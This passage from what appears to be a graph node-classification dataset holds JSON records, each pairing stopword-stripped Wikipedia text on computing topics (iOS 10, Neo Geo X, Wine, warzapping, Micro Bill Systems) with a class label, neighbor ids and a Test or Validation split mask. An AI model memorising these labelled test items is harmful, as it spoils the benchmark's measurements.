11 initial public release ios 10 september 13 2016 saw many iphones ipads temporarily disabled bricked over-the-air update requiring bricked devices connected mac pc itunes order retry update restore device factory settings apple quickly released ios 10.0.1 issued statement experienced brief issue software update process affecting small number users first hour availability problem quickly resolved apologize customers september 2016 discovered encryption local ios backups made itunes weaker ios 10 devices devices running ios 9 russian software firm elcomsoft discovered ios 10 backup process skips several security checks making approximately 2,500 times faster try passwords enabling 6 million password tries per second compared 2,400 password tries per second process elcomsoft used ios 9 firm stated impact severe apple acknowledged problem said planned issue security update also stated icloud backups affected ios 10.1 update subsequently fixed issue next web juan buis wrote late november 2016 complaints shared apple support forums various iphone models turning battery falls certain percentage blames ios 10.1.1 update wrote original post support forums explains phone dies ’ 30 percent charge left many others since replied ’ experiencing ios 10.2 released december 2016 adds telemetry diagnostic tool apple use report battery consumption diagnosing reported issues 30 battery shutdowns february 2017 apple released statement techcrunch saying ios 10.2.1 update released january 23 reduced occurrence battery shutdowns 80 iphone 6s devices 70 iphone 6 devices full statement read ios 10.2.1 apple made improvements reduce occurrences unexpected shutdowns small number users experiencing iphone ios 10.2.1 already 50 active ios devices upgraded diagnostic data 've received upgraders shows small percentage users experiencing issue 're seeing 80 reduction iphone 6s 70 reduction iphone 6 devices unexpectedly shutting also added ability phone restart without needing connect power user still encounters unexpected shutdown important note unexpected shutdowns safety issue understand inconvenience wanted fix issue quickly possible customer issues device contact applecare release apple dropped support devices either a5 a5x chip iphone 4s ipad 2 ipad 3rd generation ipad mini 1st generation ipod touch 5th generation",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      10257,
      6675,
      8211,
      11289,
      8735,
      9762,
      6186,
      4139,
      6700,
      3629,
      1074,
      8754,
      9784,
      5181,
      8253,
      8767,
      576,
      5696,
      2630,
      8774,
      8783,
      4180,
      10838,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      5749,
      7292,
      2686,
      6783,
      10878,
      6797,
      5784,
      1177,
      3228,
      2207,
      10406,
      11430,
      3241,
      5293,
      2735,
      3248,
      4283,
      3772,
      7869,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      7678,
      6377,
      9451,
      236,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      2339,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      7496,
      6474,
      4957,
      6495,
      9063,
      3948,
      4972,
      10608,
      10107,
      7556,
      3462,
      2439,
      6023,
      6539,
      7052,
      7057,
      3483,
      2979,
      11171,
      8109,
      1970,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 1624,
    "label": 3,
    "text": "Neo_Geo_X:neo geo x neo geo x ngx handheld video game console manufactured tommo licensed snk playmore information neo geo x first reported january 2012 later confirmed march first neo geo system released since discontinuation brand 2004 third neo geo handheld device following 1999 release neo geo pocket color supported 2001 neo geo x features games popular original neo geo mvs/aes hardware comes built-in 20 original neo geo games additional titles available game cards system released december 18 2012 part bundle called neo geo x gold limited edition includes docking station arcade stick bonus game card docking station modeled original neo geo aes console used charging handheld well connecting television arcade stick replica original neo geo aes arcade stick used controller handheld connected tv docking station initially device rumored retail 700+ price neo geo x gold package revealed 199 far less original neo geo aes console package released december 2012 game card offered bonus package handheld without docking station arcade stick later priced 129.99 come february 2013 however links official website stand-alone handheld subsequently removed faq stated docking station required order charge device january 2013 snk playmore announced manufacturing gold limited edition package ending last units arriving retailers april however stated handheld would continue manufactured additional games accessories would continue released system distributed tommo north america blaze europe total 36 games neo geo x. twenty games came pre-loaded system including titles signature snk series metal slug fatal fury king fighters ninja master included bonus game card gold limited edition package additional game cards announced february 2013 five-volume set called neo geo x classics features five game cards three games making total 15 games volumes released june 2013 feature following games volume 1 volume 2 volume 3 volume 4 volume 5 volume came bundled charging/data transfer cable handheld game cards include firmware update neo geo x updates handheld firmware v500 see firmware update section article update details neo geo x mega pack volume 1 also released june 2013 came one game card contains 15 games featured neo geo x classics volumes 1-5 mega pack packaged similar case used original neo geo aes game cartridges also used carrying case neo geo x handheld charging/data transfer cable included well device included 4.3-inch lcd screen sd card slot a/v output internal stereo speakers 3.5mm headphone jack micro usb port system used charging battery screen 480×272 pixels resolution original playstation portable close aspect ratio system released part gold package includes neo geo x station replica original neo geo aes console functions charging/docking station composite video hdmi output along functioning replica original neo geo aes arcade stick controller neo geo x arcade stick controllers connect docking station via two usb ports original neo geo aes controllers game cartridges memory cards compatible neo geo x handheld 8-way thumbstick directional control menu start buttons four face buttons four shoulder buttons l1 l2 r1 r2 shoulder buttons used changing screen aspect ratio pausing games buttons adjust volume brightness located handheld unit bios pre-installed games initially stored internal sandisk 2gb micro sd card later hardware revisions use chip installed directly motherboard chip yet documented console used fb alpha emulator running linux-based operating system play rom images neo geo games internal memory copy protection allowing third party bios additional games directly installed unit operating system opendingux used load final burn alpha runs .fba files game selected system modified run emulators run opendingux bios also modified get region-free bios called unibios bios many features found website http //unibios.free.fr/ sd card slot could also used load roms requires modifying sd card contact points consumer reports recommended system enthusiasts older games criticized device video quality modern televisions t3 commented replica aes docking station included joystick added overall retro charm gold package handheld might worth money neo geo games easily playable means damien mcferran writing eurogamer reacted positively quality handheld gamepad face buttons also complimented details unit packaging remained faithful original aes however criticized quality display calling washed writing scaling made games look fuzzy ill-defined also criticized image quality outputs docking station calling hdmi output muddy commenting composite output suffered color bleeding hazing effect mcferran also lamented games distributed exclusively physical media instead downloadable via wi-fi connection pc addition mentioned emulated games prone screen tearing audio issues concluding worth premium price wrote console created right intentions execution sadly lacking reportedly due low manufacturing standards employed tommo october 2013 snk playmore publicly ordered tommo cease manufacture neo geo x pull existing stock store shelves tommo response claimed compliance contract companies recently extended 2016 demanding snk retract cease desist claim early 2014 press statement sent gaming website polygon tommo claimed full contractual compliance accused snk playmore using underhanded tactics undermine sales product failing follow routes resolution put forward contract first place declining tommo offers peaceful resolution ceo manufacturer said planning taking action snk protect contractual rights",
    "neighbors": [
      7234,
      7916,
      3950,
      7983,
      1776,
      823,
      3256,
      4124
    ],
    "mask": "None"
  },
  {
    "node_id": 1625,
    "label": 4,
    "text": "Warzapping:warzapping warzapping act searching remote disable features electronics computing devices generally motion using portable computer pda warzapping named term wardialing 1983 film wargames involved searching computer systems software dialed numbers sequentially see ones connected fax machine computer devices laptops begun ship features allow rendered unusable data deleted disabling device activated unauthorized manner consequences victim could severe including economic losses loss personally important data medical records family photos vehicles also include systems unauthorized shutdowns could leave someone stranded without supplies strand children waiting picked activity prevent someone getting performing work prevent someone transported medical treatment many jurisdictions criminal civil legal action could taken perpetrator computer trespass trespass chattels addition claims charges relating negative consequences laws concerning denial-of-service attack types cybercrime might also apply point unlike wardriving software techniques publicly available enable warzapping casual computer users predicted rise popularity remote disabling devices software soon become available",
    "neighbors": [
      4945,
      2409,
      6712,
      7222
    ],
    "mask": "Test"
  },
  {
    "node_id": 1626,
    "label": 3,
    "text": "Penguin_Adventure:penguin adventure title significantly expanded upon gameplay antarctic adventure notably adding greater variety stages enemies rpg elements boss fights purchasable items several mini-games items purchased three different fisherman exchange fish give penta new abilities one items bought gun originating reference konami vietnam war-themed animated feature penguin memories usage gun would also reflected penta son pentarou appearances parodius series level design variety increased antarctic adventure forest levels ice levels water-based levels caves even outer-space bonus levels several shortcuts usually hidden underneath holes typically harmful hazards game allow player go almost completely different paths game also featured multiple endings hidden good ending available player pauses game certain number times bad ending princess dies good ending lives idea kojima would later use metal gear solid extent 2006 konami digital entertainment tokyo serialized series digital comic based video game name titled",
    "neighbors": [
      1763,
      4357,
      6797,
      9006,
      10931,
      8887
    ],
    "mask": "None"
  },
  {
    "node_id": 1627,
    "label": 4,
    "text": "Just-in-time_blocking:just-in-time blocking just-in-time blocking practice temporarily blocking internet access people specific geographic area prevent accessing information communicating first known instance just-in-time blocking documented opennet initiative 2005 kyrgyz parliamentary elections also observed 2006 belarus presidential elections 2006 tajik presidential elections alleged taken place bahrain uganda yemen 2006 presidential parliamentary elections 2016 internet watchdog organization turkey blocks identified two separate regional internet shutdowns commencing prior arrests mayors predominantly kurdish southeast turkey mesaure believed implemented government prevent protests limit critical media coverage two-week period leading 2013 iranian presidential elections anti-censorship groups herdict asl19 found access popular websites facebook meyar news twitter bbc youtube intermittently blocked iran mohammad hassan nami iran ’ minister communications information technology told tasnim news agency restrictions part “ security measures taken preserve calm country election period",
    "neighbors": [
      5135
    ],
    "mask": "None"
  },
  {
    "node_id": 1628,
    "label": 7,
    "text": "Message_queuing_service:message queuing service message queueing service message-oriented middleware mom deployed compute cloud using software service model service subscribers access queues topics exchange data using point-to-point publish subscribe patterns message queueing service aims eliminate traditional overhead associated operating in-house messaging infrastructures operating overheads include besides reducing cost message queueing service seeks simplify access messaging resources therefore facilitate integration efforts within organizations message queueing service also creates new value providing reduced costs enhanced performance reliability order provide benefits message queueing service leverages cloud computing resources storage network memory processing capacity using virtually unlimited cloud computing resources message queueing service provides internet scale messaging platform message queueing service accessible variety protocols java message service amqp rest-style apis web services ibm mq offers managed service used ibm cloud amazon web services",
    "neighbors": [
      1280,
      4194,
      10020,
      3558,
      9225,
      4236,
      1935,
      7248,
      467,
      5749,
      11038
    ],
    "mask": "Test"
  },
  {
    "node_id": 1629,
    "label": 4,
    "text": "Micro_Bill_Systems:micro bill systems micro bill systems also known microbillsys mbs platte media online collection service offices leeds england considered malware company states professional billing company offering software management solutions aid business reducing uncollectable payments company best-known clients online gambling pornography sites offering three-day free trials subscription-based services users cancel trial period mbs software begins repeating cycle full-screen pop-up windows warning users account overdue demanding payment eleven-page mbs end-user license agreement contains clause stating unless bill paid software disrupt computer use longer day four daily periods 10 minutes pop-up payment demand locked closed minimized users complained unexpected bills feel victimized deny ever accessing video sites billed mbs denies installing software stealthy means says software downloaded consent many consumers unaware agreed download security software company symantec describes microbillsys potentially unwanted application uses aggressive billing collection techniques demand payment three-day trial period says reports techniques leaving computer unable browse internet user first accesses online service whose collections managed mbs sign-up software creates unique identifier based user computer configuration ip address identifier permits mbs maintain history user access supported sites send billing notices directly user computer without consumer ever entered name credit card number personal information billing notices take form repeating pop-up windows warning users account overdue demanding payment 30-day subscription typical amounts ₤19.95 us 35.00 ₤29.95 us 52.50 pop-ups cover substantial area screen often closed effectively preventing use computer ten minutes number frequency increases time stop consumers must pay according company terms conditions agreement canceled software uninstalled balance outstanding n't pay platte sends letters addressed computer owner threatening legal action small claims court letters described one recipient sham county court notice include pre submission information form could mislead unwary thinking comes issuing court northampton county court unclear platte derives street addresses ip addresses mailings isps interviewed deny providing information filling information form returning users provide platte full name addition correct mailing address similarly users complain platte email telephone asked names addresses uninstall codes mailed payment demands follow recently platte using debt collection agency try pressurise people making payments cases charge added 'subscription mbs initial clients two adult content web sites acquired platte media platte international early 2008 company expanded include promise access hollywood movies getfilmsnow film studios warner bros. 20th century fox sent getfilmsnow cease desist order say licensed films platte advertising platte website presents company mainstream media distribution company interview radio four programme ex-managing director mbs ashley bateup indicates bulk full videos site either black white pornographic nature uk office fair trading oft charged promoting protecting consumer interests uk received numerous complaints pop-up payment demands consumers said realized agreeing billed number stated pop-up software downloaded without computer used access mbs client site oft said acting interests consumers whose access mbs sites confirmed legal jurisdiction deal issue software downloaded without consent consumer forum mbs/platte media victims forum dedicated complaints problems experienced people difficulties caused mbs platte media software downloads mbs denies installing software stealthy means says software downloaded consent users visit mbs client site malware researcher computer security company prevx found evidence surreptitious installations journalist investigating complaints called installation process unmistakable download clicking screens entering four-digit number among required steps acceptance eleven-page end-user license agreement includes clause company says looks complaints usually member household downloaded software without reading terms conditions billing pop-ups begin refuse admit use computer owner owner assumes computer somehow infected company says customer service team experience people seem move denial spouses partners pornography use question software difficult non-technical users remove due part use mutually protective executable files company says software easy remove many people would pay services already consumed response complaints office fair trading reviewed mbs sign-up process fairness terms conditions 27 march 2008 oft announced mbs/platte media undertakings pledges make sign-up process fair setting limits amount disruption pop-up payment demands could cause company promised make clear sign-up process customer entering contract billing pop-ups appear trial period ends also promised provide information consumers 'pop-up generating software uninstalled time company promised cause 20 pop-ups cause one pop-up 24-hour period cause pop-ups beyond expiry six weeks payment become due also promised cause ten locked-open pop-ups cause locked-open pop-ups remain locked 60 seconds payment demands delivered pop-up windows restricted announcing mbs undertakings office fair trading head consumer protection said believe undertakings achieve right balance protecting consumer interests without stifling innovation 'on-line market place local authority locale mbs leeds office charged preventing exploitation vulnerable consumers west yorkshire trading standards received hundreds complaints pop-ups spokesman authority said opinion time company operating within bounds existing legislation would difficult take formal legal action one woman whose family computer caught pop-up cycle interviewed guardian wonders company activities indeed legitimate maintained west yorkshire trading standards n't pressure put office fair trading tighten law 9 march 2009 following protracted letterwriting campaign conducted platte/mbs victims forum martin horwood mp raised question house commons activities platte specifically number complaints received oft trading standards activities response informed platte ceased trading uk effect 25 february 2009 specific reason given withdrawal fair assume continued resistance british consumers regarded unfair business model must played part decision along threat action hm revenue concerning possible non-payment vat email michael pollitt company said stopped operating uk reasons decision intentions simply related original marketing business model adding obviously like business would making sure stopping marketing uk market done sensible orderly manner best preserve interests customers",
    "neighbors": [
      9569,
      423,
      4718,
      1970,
      2611,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 1630,
    "label": 5,
    "text": "Network_Data_Representation:network data representation network data representation ndr implementation presentation layer osi model",
    "neighbors": [
      10024
    ],
    "mask": "Test"
  },
  {
    "node_id": 1631,
    "label": 5,
    "text": "Demultiplexer_(media_file):demultiplexer media file demultiplexer digital media files media demultiplexer also called file splitter laymen consumer software providers software demultiplexes individual elementary streams media file e.g audio video subtitles sends respective decoders actual decoding media demultiplexers decoders format container handlers separate program streams file supply respective audio video subtitles decoders playback difficulties playback audio video may result several legacy file splitters particular file format installed operating system causes decoder-to-file-splitter mismatch resulting playback failure media players",
    "neighbors": [
      2432,
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      9381,
      3114,
      10027,
      1967,
      432,
      7983,
      2994,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      7667,
      6389,
      4089,
      124,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 1632,
    "label": 2,
    "text": "Wine_(software):wine software wine recursive backronym wine emulator free open-source compatibility layer aims allow computer programs application software computer games developed microsoft windows run unix-like operating systems wine also provides software library known winelib developers compile windows applications help port unix-like systems wine provides windows runtime environment translates windows system calls posix-compliant system calls recreating directory structure windows systems providing alternative implementations windows system libraries system services codice_1 various components internet explorer windows registry editor msiexec wine predominantly written using black-box testing reverse-engineering avoid copyright issues selection wine emulator name wine project result naming discussion august 1993 credited david niemi confusion caused early faq using windows emulator invalid sources appear wine project name set code emulation virtualization occurs running windows application wine emulation usually would refer execution compiled code intended one processor x86 interpreting/recompiling software running different processor powerpc name sometimes appears forms wine wine project developers agreed standardize form wine wine primarily developed linux macos well-maintained packages available platforms 2007 survey desktoplinux.com 38,500 linux desktop users 31.5 respondents reported using wine run windows applications plurality larger x86 virtualization programs combined well larger 27.9 reported running windows applications bob amstadt initial project leader eric youngdale started wine project 1993 way run windows applications linux inspired two sun microsystems products wabi solaris operating system public windows initiative attempt get windows api fully reimplemented public domain iso standard rejected due pressure microsoft 1996 wine originally targeted 16-bit applications windows 3.x focuses 32-bit 64-bit versions become standard newer operating systems project originated discussions usenet comp.os.linux june 1993 alexandre julliard led project since 1994 project proven time-consuming difficult developers mostly incomplete incorrect documentation windows api microsoft extensively documents win32 functions areas file formats protocols publicly available specification microsoft windows also includes undocumented low-level functions undocumented behavior obscure bugs wine must duplicate precisely order allow applications work properly consequently wine team reverse-engineered many function calls file formats areas thunking wine project originally released wine mit license x window system owing concern proprietary versions wine contributing changes back core project work march 2002 used lgpl licensing wine officially entered beta version 0.9 25 october 2005 version 1.0 released 17 june 2008 15 years development version 1.2 released 16 july 2010 version 1.4 7 march 2012 version 1.6 18 july 2013. version 1.8 19 december 2015 development versions released roughly every two weeks wine-staging relatively independently maintained set relatively aggressive patches deemed ready winehq developers merging wine repository still considered useful wine-compholio fork mainly covers experimental functions bug fixes since january 2017 patches wine-staging begins actively merged winehq upstream wine-compholio transferred project alistair leslie-hughes key winehq developer main corporate sponsor wine codeweavers employs julliard many wine developers work wine crossover codeweavers supported version wine crossover includes application-specific tweaks considered suitable winehq version well additional proprietary components involvement corel time assisted project chiefly employing julliard others work corel interest porting wordperfect office office suite linux especially corel linux corel later cancelled linux-related projects microsoft made major investments corel stopping wine effort corporate sponsors include google hired codeweavers fix wine picasa ran well enough ported directly linux using binary windows google later paid improvements wine support adobe photoshop cs2 wine also regular beneficiary google summer code program goal wine implement windows apis fully partially required programs users wine wish run top unix-like system programming interfaces microsoft windows family oses consist largely dynamic-link libraries dlls contain huge number wrapper sub-routines system calls kernel ntos kernel-mode program ntoskrnl.exe typical windows program calls windows dlls turn calls user-mode gdi/user32 libraries turn uses kernel32.dll win32 subsystem responsible dealing kernel system calls system-call layer considered private microsoft programmers documentation publicly available published interfaces rely subsystems running top kernel besides number programming interfaces implemented services run separate processes applications communicate user-mode services rpcs wine implements windows application binary interface abi entirely user space rather kernel module wine mostly mirrors hierarchy services normally provided kernel windows instead provided daemon known wineserver whose task implement basic windows functionality well integration x window system translation signals native windows exceptions although wineserver implements aspects windows kernel possible use native windows drivers due wine underlying architecture prevents certain applications games working example using starforce copy-protection requires virtual device drivers installed wine allows loading windows dlls unix shared objects windows programs builtin implementation basic windows dlls namely ntdll kernel32 gdi32 user32 uses shared object method must use functions host operating system well higher-level libraries wined3d free use dll format many cases users choose load dll windows instead one implemented wine provide functionalities yet implemented wine may also cause malfunctions relies something else present wine wine tracks state implementation automated unit testing done every git commit office software make use complex gpu-accelerated graphics apis computer games run games properly wine would forward drawing instructions host os even translate something host understand directx collection microsoft apis rendering audio input 2019 wine 4.0 contains directx 12 implementation vulkan api directx 11.2 opengl wine 4.0 also allows wine run vulkan applications handing draw commands host os case macos translating metal api moltenvk much wine directx effort goes building wined3d translation layer direct3d directdraw api calls opengl 2019 component supports directx 11 wine good enough run overwatch d3d11 besides used wine wined3d dlls also useful windows operating system allowing older graphic cards run games using newer directx versions old ddraw-based games render correctly work ongoing move direct3d backend vulkan api direct3d 12 support 4.0 provided vkd3d subproject wined3d 2019 experimentally ported use vulkan api wine patched alternatively run direct3d 9 without translation via free open-source gallium3d state tracker dx9 gallium3d layer allows direct pass-through drawing commands wine usually invoked command-line interpreter codice_2 utility codice_3 starts graphical user interface controls adjusting basic options gui configuration utility included wine winecfg makes configuring wine easier making unnecessary edit registry directly although needed done included registry editor similar windows regedit applications require tweaking simply installing application order work properly manually configuring wine use certain windows dlls wine project integrate workarounds wine codebase instead preferring focus solely improving wine implementation windows api approach focuses wine development long-term compatibility makes difficult users run applications require workarounds consequently many third-party applications created ease use applications n't work box within wine wine wiki maintains page current obsolete third-party applications developers direct3d portions wine continued implement new features pixel shaders increase game support wine also use native dlls directly thus increasing functionality license windows needed unless dlls distributed application wine also includes open-source implementations several windows programs notepad wordpad control iexplore explorer wine application database appdb community-maintained on-line database windows programs works wine well work wine ensures good backward compatibility legacy windows applications including written windows 3.1x wine mimic different windows versions required programs going far back windows version 2.0 however windows 1.x windows 2.x support removed wine development version 1.3.12 dosbox installed system see ms-dos wine development version 1.3.12 later nevertheless show windows 2.0 option windows version mimic wine still wo n't run windows 2.0 programs ms-dos windows functions currently integrated backward compatibility wine superior windows newer versions windows force users upgrade legacy windows applications many cases wine offer better legacy support newer versions windows compatibility mode wine run 16-bit windows programs 64-bit operating system uses x86-64 64-bit cpu functionality found 64-bit versions microsoft windows wine partially supports windows console applications user choose backend use manage console choices include raw streams curses user32 using raw streams curses backends windows applications run unix terminal preliminary support 64-bit windows applications added wine 1.1.10 december 2008. support considered stable two versions wine built separately result building wine64 produces environment capable running x86-64 applications wine stable support wow64 build allows 32-bit 64-bit windows applications run inside wine instance perform build one must first build 64-bit version build 32-bit version referencing 64-bit version like microsoft wow64 32-bit build process add parts necessary handling 32-bit programs 64-bit build functionality seen least 2010 early versions microsoft windows run top ms-dos windows programs may depend ms-dos programs runnable wine good support ms-dos starting development version 1.3.12 wine tries running ms-dos programs dosbox dosbox available system however due bug current versions wine incorrectly identify windows 1.x windows 2.x programs ms-dos programs attempting run dosbox work wine provides winelib allows shared-object implementations windows api used actual libraries unix program allows windows code built native unix executables since october 2010 winelib also works arm platform support solaris sparc dropped version 1.5.26 wine provides support arm well arm64/aarch64 processors windows flavors run wine run arm/win32 applications intended unlocked windows rt devices windows rt programs windows ce support either x86 arm missing unofficial pre-alpha proof-of-concept version called winece allows support 4 3 february 2013 fosdem talk brussels alexandre julliard demonstrated early demo wine running google android operating system experimental builds wine android x86 arm released late 2017 routinely updated official developers ever since default builds implement cross-architecture emulation via qemu result arm versions run arm applications use win32 api wine default uses specialized windows builds gecko mono substitute microsoft internet explorer .net framework wine built-in implementations jscript vbscript possible download run microsoft installers programs winetricks manually wine known good support versions internet explorer reasonably recent versions internet explorer 8 windows xp version reports usable rating wine appdb out-of-the-box winetricks offer auto-installation internet explorer 6 8 versions reasonably expected work built-in workarounds alternative installing internet explorer directly use now-defunct ies4linux compatible latest versions wine development ies4linux inactive core wine development aims correct implementation windows api whole sometimes lagged areas compatibility certain applications direct3d example remained unimplemented 1998 although newer releases increasingly complete implementation codeweavers markets crossover specifically running microsoft office major windows applications including games codeweavers employs alexandre julliard work wine contributes code wine project lgpl codeweavers also released new version called crossover mac intel-based apple macintosh computers 10 january 2007 crossover includes functionality crossover games crossover pro lines therefore crossover games crossover pro longer available single products crossover games optimized running windows video games unlike crossover n't focus providing stable version wine instead experimental features provided support newer games findev inc. produced proprietary cedega software formerly known winex cedega represented fork last mit-licensed version wine 2002 much like crossover games findev cedega targeted towards running windows video games 7 january 2011 findev inc. announced continued development cedega technology gametree developer program findev inc. allowed members keep using cedega id password 28 february 2011 findev also produced cider library apple–intel architecture macintoshes instead end-user product cider like winelib wrapper allowing developers adapt games run natively intel mac without changes source code russian company etersoft developing proprietary version wine since 2006 wine etersoft supports popular russian applications example 1c enterprise 1c company etersoft going issue wine etersoft cad oriented towards cad systems autocad bricscad compass-3d darwine port wine libraries darwin macos powerpc intel x86 architectures patches x86 version merged back main branch wine 2009 development ppc version abandoned mike kronenberg previously created winehelper darwine add gui macos style app interacting wine later replaced winebottler darwine provides macos compatible packages compiled wine repository pipelight team produced custom version wine wine-compholio acts wrapper windows npapi plugins within linux browsers tool permits linux users run microsoft silverlight microsoft equivalent adobe flash unity web plugin along variety npapi plugins project provides extensive set patches upstream wine project occasionally get approved added upstream wine pipelight largely obsolete modern browsers longer support npapi plugins silverlight deprecated microsoft 21 august 2018 valve announced new variation wine named proton designed integrate linux version company steam software including steam installations built linux-based steamos operating system steam machine computers valve goal proton enable steam users linux play games lack native linux port particularly back-catalog games ultimately integration steam well improvements game support relative mainline wine give users simple plug-and-play experience would get playing game natively linux proton entered public beta immediately upon announced valve already collaborating codeweavers since 2016 develop improvements wine gaming performance already merged upstream wine project specific improvements incorporated proton include vulkan-based direct3d 10 11 12 implementations via vkd3d dxvk multi-threaded performance improvements via esync improved handling fullscreen games better automatic game controller hardware support proton fully open-source available via github projects using wine source code include wine project received number technical philosophical complaints concerns years wine ability run windows binary code concerns raised native windows viruses malware affecting unix-like operating systems wine run malware programs running wine confined current user privileges restricting undesirable consequences reason developers wine recommend never running superuser malware research software zerowine runs wine linux virtual machine keep malware completely isolated host system alternative improve security without slowness using virtual machine run wine lxc container like anbox software default android another security concern implemented specifications ill-designed allow security compromise wine implements specs also implement security vulnerabilities contain instance problem 2006 windows metafile vulnerability saw wine implementing vulnerable setabortproc escape common concern wine existence means vendors less likely write native linux macos bsd applications example worth considering ibm 1994 operating system os/2 warp article describes weaknesses os/2 killed first one wine project responds complaints one wiki pages also wine wiki page claims wine help break chicken-and-egg problem linux desktop use wine gaming proved specifically controversial linux community feel preventing least hindering growth native linux gaming platform microsoft made public statements wine however windows update software block updates microsoft applications running wine 16 february 2005 ivan leo puoti discovered microsoft started checking windows registry wine configuration key would block windows update component puoti noted also first time microsoft acknowledges existence wine wine ceo frank ruben",
    "neighbors": [
      9746,
      6180,
      7204,
      9780,
      3129,
      11322,
      7739,
      3137,
      4173,
      4174,
      7760,
      4695,
      603,
      11357,
      1632,
      9839,
      4728,
      10873,
      5754,
      2180,
      2692,
      8837,
      5768,
      6797,
      3235,
      2738,
      7355,
      700,
      9921,
      2244,
      8913,
      6358,
      6361,
      10459,
      10971,
      5343,
      1761,
      3815,
      5356,
      9964,
      1776,
      10480,
      2804,
      8438,
      4347,
      8957,
      8445,
      7941,
      4360,
      8976,
      3857,
      8466,
      8977,
      5397,
      3350,
      7450,
      10016,
      295,
      10024,
      11559,
      10026,
      5931,
      303,
      7983,
      9525,
      823,
      2361,
      321,
      5964,
      3413,
      4437,
      1900,
      7020,
      11632,
      1399,
      2942,
      2943,
      8066,
      3462,
      8582,
      9097,
      6550,
      2457,
      8607,
      1952,
      6049,
      11683,
      10153,
      7088,
      11184,
      8118,
      10173,
      9152,
      9665,
      9166,
      2519,
      9177,
      5594,
      4059,
      1501,
      4061,
      7150,
      11247,
      499,
      8700,
      2045,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1633,
    "label": 2,
    "text": "Nokia_N75:nokia n75 nokia n75 smartphone nokia uses series 60 3rd edition symbian os mobility carrier n75 united states made specifically north american 3g market supporting wcdma 850/1900 frequencies however also available countries uk cnet gave 3/5 liking call quality display disliking battery life camera mobile tech review gave 4/5 pcmag gave 2.5/5 similar praise criticism",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      10557,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      3533,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1634,
    "label": 4,
    "text": "Trusted_Information_Systems:trusted information systems trusted information systems tis computer security research development company 1980s 1990s performing computer communications information security research organizations nsa darpa arl afrl spawar others tis founded 1983 nsa veteran steve walker various times employed notable information security experts including david elliott bell martha branstad john pescatore marv schaefer steve crocker marcus ranum wei xu john williams steve lipner carl ellison tis headquartered glenwood maryland surprisingly rural location company started walker basement shady lane glenwood md company grew rather move baltimore washington d.c. suburbs small office building constructed land next walker new home route 97 tis projects included following tis operating system work directly affected bsd/os gauntlet firewall ipsec based well linux freebsd hp ux sun os darwin others company went public 1996 soon afterwards attempted acquire pgp inc. instead acquired 1998 network associates nai later became mcafee already bought pgp inc. 1997 security research organization became nai labs gauntlet engineering development organization folded network associates engineering development nai labs went couple branding changes complemented network associates branding efforts 2001 name changed network associates laboratories better match corporate identity 2002-2003 major branding initiative network associates culminating selection flag brand mcafee result security research organization became mcafee research 2003 sparta inc. employee-owned company acquired network security branch mcafee research 2005 sparta acquired remaining branches mcafee research organized security research division srd information systems security operation isso 2008 cobham plc british aerospace company acquired sparta organizational changes srd isso affect security research separate path tis primary commercial product gauntlet firewall acquired 1999 mcafee secure computing corporation scc used one tis major competitors time mcafee n't interested firewall vendor code base integrated secure computing firewall product branded sidewinder firewall returned mcafee secure computing acquired 2008 re-branded mcafee enterprise firewall end product line came 2013 following mcafee acquisition another major firewall vendor finland-based stonesoft mcafee announced october 2013 intention migrate existing installed base firewalls stonesoft stonegate",
    "neighbors": [
      5506,
      6787,
      1297,
      1304,
      10908,
      3742,
      8998,
      9383,
      7983,
      823,
      1978,
      3133,
      704,
      10436,
      2887,
      10455,
      9817,
      8283,
      6773,
      125,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1635,
    "label": 3,
    "text": "Titan_(microprocessor):titan microprocessor titan supposed family 32-bit power isa-based microprocessor cores designed applied micro circuits corporation amcc scrapped 2010 according reports applied micro chose continue development powerpc 400 core instead 40 nm fabrication process designed foundation embedded processors system-on-a-chip soc solutions high performance reaching speeds 2 ghz would remain extremely power efficient drawing 2.5 w per core usually trade-off performance power amcc used fast14 technology intrinsity build extremely efficient microprocessor design leveraging high performance combined low power comparably cheap bulk 90 nm cmos manufacturing using nmos transistors latches design results chip fewer transistors traditional design thus reducing cost design allows dual core soc implementations consuming less 15 w. plans single dual quad-core versions titan new superscalar order 8-9 stage core novel three-stage cpu cache design small 4/4 kib instruction data caches level 0 sit traditional 32/32 kib l1 caches 1 mb l2 cache shared cores supporting four titan compliant power isa v.2.04",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      1461,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10180,
      336,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      8931,
      869,
      10214,
      10985,
      10734,
      3185,
      4211,
      5235,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1636,
    "label": 1,
